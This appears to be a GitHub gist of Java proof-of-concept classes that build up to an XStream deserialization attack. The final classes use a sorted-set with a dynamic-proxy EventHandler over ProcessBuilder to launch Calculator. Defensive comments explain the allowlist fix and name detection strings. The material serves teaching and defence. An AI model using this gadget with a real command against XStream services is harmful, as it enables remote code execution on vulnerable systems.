Last active
March 11, 2021 03:27
Script examples of XStream PoCs
import java.io.IOException; | |
/**
 * Passes a hand-written XStream document to {@code XMLGenerator.generateTOfromXML}.
 *
 * <p>The document declares a sorted set holding one string and one dynamic proxy for
 * {@code java.lang.Comparable}. The proxy's handler is a {@code java.beans.EventHandler}
 * whose target is a {@code java.lang.ProcessBuilder} and whose action is {@code start}.
 * The type names come from the XML itself, which is why untrusted XML must never reach
 * an XStream instance that has no type restrictions.
 *
 * <p>Defensive notes: configure XStream type permissions so that only the expected
 * classes can be instantiated (for example {@code addPermission(NoTypePermission.NONE)}
 * followed by {@code allowTypes(...)}). The {@code <dynamic-proxy>} element and the
 * {@code class="java.beans.EventHandler"} attribute are distinctive strings to look for
 * in inbound XML.
 *
 * <p>{@code XMLGenerator} is not part of this listing.
 */
public class PoC_XMLGenerator
{
    /**
     * Builds the document and hands it to the deserializer.
     *
     * @param args unused
     * @throws IOException declared by the original signature; nothing visible here throws it
     */
    public static void main(String[] args) throws IOException
    {
        final String executable = "open";
        final String executableArgument = "/Applications/Calculator.app";

        // Assemble the document fragment by fragment; the result is one unbroken string.
        StringBuilder xml = new StringBuilder();
        xml.append("<sorted-set>");
        xml.append("<string>foo</string>");
        xml.append("<dynamic-proxy>");
        xml.append("<interface>java.lang.Comparable</interface>");
        xml.append("<handler class=\"java.beans.EventHandler\">");
        xml.append(" <target class=\"java.lang.ProcessBuilder\">");
        xml.append(" <command>");
        xml.append(" <string>").append(executable).append("</string>");
        xml.append(" <string>").append(executableArgument).append("</string>");
        xml.append(" </command>");
        xml.append(" </target>");
        xml.append(" <action>start</action>");
        xml.append("</handler>");
        xml.append("</dynamic-proxy>");
        xml.append("</sorted-set>");

        XMLGenerator.generateTOfromXML(xml.toString());

        // The author's message says this line is not expected to run, presumably because
        // the call above does not return normally. NOTE(review): confirm.
        System.out.println("Will not get here");
    }
}
/**
 * Baseline round trip: serializes a {@code Square} to XML with
 * {@code XMLGenerator.generateXML} and reads it back with
 * {@code XMLGenerator.generateTOfromXML}.
 *
 * <p>This is the intended, benign use of the helper. {@code Square} and
 * {@code XMLGenerator} are not part of this listing.
 */
public class XStreamPoC {

    /**
     * Prints the XML produced for a square of size 5, then the object rebuilt from it.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        Square original = new Square();
        original.setSize(5);

        final String serialized = XMLGenerator.generateXML(original);
        String xmlReport = String.format("resultXML: \n \n%s \n\n", serialized);
        System.out.println(xmlReport);

        // The XML that was just produced goes straight back in, so the cast is expected to hold.
        Square restored = (Square) XMLGenerator.generateTOfromXML(serialized);
        String objectReport = String.format("sq1: \n \n%s \n\n", restored);
        System.out.println(objectReport);
    }
}
/**
 * Deserializes a hand-written {@code <square>} document rather than XML produced by the
 * serializer, showing that the input can be authored by anyone who can supply a string.
 *
 * <p>{@code Square} and {@code XMLGenerator} are not part of this listing.
 */
public class XStreamPoC {

    /**
     * Parses a literal square document and prints the resulting object.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String squareXml = "<square>"
                + " <size>5</size>"
                + "</square> ";

        // The root element name selects the type; here it matches the cast target.
        Square parsed = (Square) XMLGenerator.generateTOfromXML(squareXml);

        String report = String.format("sq1: \n \n%s \n\n", parsed);
        System.out.println(report);
    }
}
import com.thoughtworks.xstream.XStream; | |
import com.thoughtworks.xstream.io.xml.DomDriver; | |
/**
 * Same hand-written {@code <square>} input as the previous step, but with the XStream
 * calls inlined. According to the author's note, this is what
 * {@code XMLGenerator.generateTOfromXML} does internally.
 *
 * <p>NOTE(review): the XStream instance below only registers annotations for
 * {@code Square} and {@code Rectangle}. It configures no type permissions, so nothing in
 * this code limits which classes the XML may name. Code that parses untrusted XML should
 * add an allowlist, for example {@code addPermission(NoTypePermission.NONE)} followed by
 * {@code allowTypes(...)}.
 */
public class XStreamPoC {

    /**
     * Parses a literal square document with a locally built XStream and prints the result.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String squareXml = "<square>"
                + " <size>5</size>"
                + "</square> ";

        // Inlined equivalent of XMLGenerator.generateTOfromXML(inputXML), per the author's note.
        XStream parser = new XStream(new DomDriver());
        parser.processAnnotations(Square.class);
        parser.processAnnotations(Rectangle.class);

        Square parsed = (Square) parser.fromXML(squareXml);

        String report = String.format("sq1: \n \n%s \n\n", parsed);
        System.out.println(report);
    }
}
/**
 * Sends a {@code <string>} document to the deserializer and prints both the value and
 * the runtime class of the result. The result is held as {@code Object} so that a type
 * other than {@code Square} can be observed.
 *
 * <p>{@code XMLGenerator} is not part of this listing.
 */
public class XStreamPoC {

    /**
     * Parses a literal string document and reports what came back.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String stringXml = "<string>"
                + " Hello"
                + "</string> ";

        // No cast to Square here: the point is to see which type the XML selected.
        Object parsed = XMLGenerator.generateTOfromXML(stringXml);

        String report = String.format("sq1 value: %s \n\nsq1 class: %s", parsed, parsed.getClass());
        System.out.println(report);
    }
}
/**
 * Sends a document whose root element is the fully qualified class name
 * {@code com.thoughtworks.xstream.InitializationException}, then prints the value and
 * runtime class of the result.
 *
 * <p>The class was never registered through {@code processAnnotations}; it is named only
 * by the XML. This is the behaviour a type allowlist is meant to stop.
 * {@code XMLGenerator} is not part of this listing.
 */
public class XStreamPoC {

    /**
     * Parses a document naming a library exception class and reports what came back.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String exceptionXml = "<com.thoughtworks.xstream.InitializationException>"
                + " Hello XStream Exception object"
                + "</com.thoughtworks.xstream.InitializationException> ";

        // Held as Object so the runtime class chosen by the XML can be printed.
        Object parsed = XMLGenerator.generateTOfromXML(exceptionXml);

        String report = String.format("sq1 value: %s \n\nsq1 class: %s", parsed, parsed.getClass());
        System.out.println(report);
    }
}
/**
 * Sends a document whose root element is {@code java.lang.ProcessBuilder} and casts the
 * result to {@code Square}.
 *
 * <p>NOTE(review): the cast runs only after {@code generateTOfromXML} has returned, so
 * it cannot stop the deserializer from building whatever type the XML named. At best it
 * raises {@code ClassCastException} afterwards. Type checks belong inside the parser
 * configuration (an XStream allowlist), not at the call site.
 *
 * <p>{@code Square} and {@code XMLGenerator} are not part of this listing.
 */
public class XStreamPoC {

    /**
     * Parses a document naming {@code java.lang.ProcessBuilder} and prints the result if
     * the cast succeeds.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String builderXml = "<java.lang.ProcessBuilder>"
                + " <command>ExecuteMe</command>"
                + "</java.lang.ProcessBuilder>";

        // The author left an Object-typed variant of this line commented out; the cast is kept.
        Square parsed = (Square) XMLGenerator.generateTOfromXML(builderXml);

        String report = String.format("sq1 value: %s \n\nsq1 class: %s", parsed, parsed.getClass());
        System.out.println(report);
    }
}
import java.beans.EventHandler; | |
import java.util.Set; | |
import java.util.TreeSet; | |
/**
 * Builds in plain Java the object graph that the later XML document describes: a
 * {@code TreeSet} holding the string {@code "foo"} and a {@code Comparable} proxy made
 * by {@code EventHandler.create} over a {@code ProcessBuilder} with action
 * {@code "start"}. The set is then passed to {@code XMLGenerator.generateXML}.
 *
 * <p>NOTE(review): a {@code TreeSet} compares a new element with those already present,
 * so adding the proxy to the non-empty set presumably calls the proxy's
 * {@code compareTo} and therefore the handler's action on this machine, before any XML
 * is produced. Verify before relying on {@code generateXML} being reached.
 *
 * <p>{@code XMLGenerator} is not part of this listing.
 */
public class XStreamPoC {

    /**
     * Constructs the set and asks the helper to serialize it.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        Set<Comparable> elements = new TreeSet<Comparable>();
        elements.add("foo");

        ProcessBuilder handlerTarget = new ProcessBuilder("open","/Applications/Calculator.app");
        Comparable proxy = EventHandler.create(Comparable.class, handlerTarget, "start");
        elements.add(proxy);

        // The XML is not used further in this step.
        String serializedSet = XMLGenerator.generateXML(elements);

        // The original kept the earlier <java.lang.ProcessBuilder> payload experiment
        // (parse, cast to Square, print value and class) commented out at this point.
    }
}
/**
 * Sends the hand-written sorted-set document to {@code XMLGenerator.generateTOfromXML}
 * and casts the result to {@code Square}.
 *
 * <p>The document declares a sorted set holding one string and one dynamic proxy for
 * {@code java.lang.Comparable}. The proxy's handler is a {@code java.beans.EventHandler}
 * whose target is a {@code java.lang.ProcessBuilder} and whose action is {@code start}.
 * The original kept the plain-Java construction of this graph (TreeSet plus
 * {@code EventHandler.create}) commented out above the payload.
 *
 * <p>NOTE(review): the {@code (Square)} cast is evaluated only after deserialization
 * has finished, so it offers no protection. Restrict the parser with an XStream type
 * allowlist instead. The {@code <dynamic-proxy>} element and the
 * {@code class="java.beans.EventHandler"} attribute are distinctive strings to look for
 * in inbound XML.
 *
 * <p>{@code Square} and {@code XMLGenerator} are not part of this listing.
 */
public class XStreamPoC {

    /**
     * Assembles the document, parses it, and prints the result if the call and cast complete.
     *
     * @param args unused
     */
    public static void main(String[] args)
    {
        final String executable = "open";
        final String executableArgument = "/Applications/Calculator.app";

        // Joined with an empty separator, so the document is the fragments back to back.
        final String documentXml = String.join("",
                "<sorted-set>",
                "<string>foo</string>",
                "<dynamic-proxy>",
                "<interface>java.lang.Comparable</interface>",
                "<handler class=\"java.beans.EventHandler\">",
                " <target class=\"java.lang.ProcessBuilder\">",
                " <command>",
                " <string>", executable, "</string>",
                " <string>", executableArgument, "</string>",
                " </command>",
                " </target>",
                " <action>start</action>",
                "</handler>",
                "</dynamic-proxy>",
                "</sorted-set>");

        // The author left an Object-typed variant of this line commented out; the cast is kept.
        Square parsed = (Square) XMLGenerator.generateTOfromXML(documentXml);

        String report = String.format("sq1 value: %s \n\nsq1 class: %s", parsed, parsed.getClass());
        System.out.println(report);
    }
}
Hi, I'm wondering where I could find the code behind "XMLGenerator.generateTOfromXML(payload);"?